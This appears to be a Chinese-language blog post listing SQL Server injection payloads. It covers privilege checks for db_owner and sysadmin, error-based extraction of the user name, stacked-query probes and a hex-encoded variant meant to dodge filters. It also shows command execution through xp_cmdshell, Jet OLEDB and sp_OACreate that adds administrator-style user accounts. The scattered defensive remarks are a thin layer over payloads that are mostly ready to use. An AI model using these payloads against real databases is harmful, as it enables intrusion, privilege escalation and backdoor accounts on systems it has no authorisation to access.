

//检测当前数据库用户是否属于 db_owner 角色(应用连接账号应按最小权限配置,不应具有该角色)
and 1=(Select IS_MEMBER('db_owner')) 
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- 

//检测当前登录是否有权访问某数据库(此处为 master)
and 1= (Select HAS_DBACCESS('master')) 
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 -- 


数字型参数
and char(124)%2Buser%2Bchar(124)=0 

字符型参数
' and char(124)%2Buser%2Bchar(124)=0 and ''=' 

搜索型参数(LIKE 查询)
' and char(124)%2Buser%2Bchar(124)=0 and '%'=' 

通过类型转换报错回显当前用户名(不向客户端返回详细的数据库错误信息,即可消除这类回显)
and user>0 
' and user>0 and ''=' 

检测当前登录是否属于 sysadmin 服务器角色(即 SA 权限);第二条语句用十六进制(UTF-16)编码的 'sysadmin' 代替字符串字面量,检测规则需同时覆盖这种写法
and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 -- 

检测是不是MSSQL数据库 
and exists (select * from sysobjects);-- 

检测是否支持多语句执行(堆叠查询)
;declare @d int;-- 

恢复 xp_cmdshell(重新注册已被删除的扩展存储过程;该操作需要 sysadmin 权限,防守方应审计对 sp_addextendedproc 的调用)
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';-- 


select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') 

//----------------------- 
// 执行命令 
//----------------------- 
首先修改 Jet 沙盒模式(SandBoxMode)注册表项(将其设为 1 实际上是对非 Access 程序关闭沙盒限制,而不是"开启"保护;防守方应监控该键值的变更):
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 

然后利用 jet.oledb 执行系统命令(保持 Ad Hoc Distributed Queries 选项关闭,可阻止 openrowset 的这种用法)
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")') 

通过 OLE 自动化存储过程(sp_OACreate / sp_OAMethod)执行命令(Ole Automation Procedures 选项默认关闭,应保持关闭)
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';-- 

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111' 

判断xp_cmdshell扩展存储过程是否存在: 
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') 

写注册表(与上文修改 SandBoxMode 的语句相同)
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 

  • 发表于 2021-02-07 08:09